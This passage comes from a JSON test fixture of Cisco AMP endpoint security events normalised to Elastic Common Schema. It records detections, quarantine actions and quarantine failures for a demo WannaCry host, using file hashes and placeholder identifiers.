Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + 
"id": "6419204910251770000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204910251769881", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094095604Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419204905956802584", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094097475Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": 
"6419204905956802583", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094099331Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419204905956802582", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094101204Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": 
"6419204905956802581", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094103078Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419204905956802580", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 4688, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "md5": "7bf2b57f2a205768755c07f238fb32cc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" 
+ ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094104954Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"
7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204905956803000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204905956802579", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094106806Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204905956803000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6419204905956802580", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094108755Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + 
"action": "Threat Quarantined", + "id": "6419204905956803000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419204905956802579", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094110607Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204901661835000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419204901661835277", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094112459Z", + "original": 
